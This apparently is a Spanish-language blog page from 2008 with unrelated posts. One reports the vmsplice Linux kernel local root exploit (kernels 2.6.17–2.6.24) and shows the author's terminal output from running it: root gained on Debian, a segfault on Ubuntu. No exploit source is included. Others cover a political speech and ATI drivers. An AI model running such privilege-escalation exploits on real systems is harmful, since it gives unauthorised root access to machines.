México, Distrito Federal
Domingo 24 de febrero de 2008
* Discurso del presidente legítimo de México, Andrés Manuel López Obrador, en la Asamblea General por la Defensa de la Constitución y del Petróleo, realizada frente a la Torre de Petróleos
Leer nota completa…
Ayer (10 de febrero de 2008) se dio a conocer un exploit: jessica_biel_naked_in_my_bed.c que afectaba a los kernels que van del 2.6.17 al 2.6.24.
Cualquier usuario con acceso al servidor (ssh, telenet,…) podia compilar y correr tal exploit, ganando, como consecuencia, id de superusuario.
En mi caso (obteniendo el código en slashdot), el exploit me funcionó en un sistema debian:
[aramirez@debian]~> ./jessica_biel_naked_in_my_bed
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7db8000 .. 0xb7dea000
[+] root
root@debian:~# id
uid=0(root) gid=0(root) groups=500(users)
más no en un ubuntu:
alex@nopalitux-desktop:~$ ./jessica_biel_naked_in_my_bed
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7e1b000 .. 0xb7e4d000
Fallo de segmentación
alex@nopalitux-desktop:~$
La vulnerabilidad del kernel (que obviamente incumbe a todas las distros: Debian, gentoo, red hat, fedora, slackware, opensuse, etc. ) hace uso del módulo vmsplice, incorporado precisamente en la version 2.6.17 del mismo como una más de las buenas características en ese entonces implementadas (más información sobre vmsplice en http://lwn.net/Articles/181169/). Esta vulnerabilidad afecta específicamente la syscall de vmsplice
otorgando acceso a lectura/escritura en posiciones arbitrarias de memoria.
Esta semana fueron liberados por parte de ATI los controladores para sus tarjetas de video (aquí la noticia).
Hasta este momento definitivamente NVidia tomó la delantera y yo vivía algo arrepentida de tener una Ati Radeon X700 Pro 
(eso sí, con aceleración gráfica lograda).
Aun cuando Compiz no gasta muchos recursos de la tarjeta, sin duda alguno para los usuarios de Ati esto promete una mejora en el desempeño y rendimiento gráfico.
Adios a XGL y bienvenido AIGLX 
............................
............................
| ||||||||||||||||||||||||||||||||||||||||||||||||||||
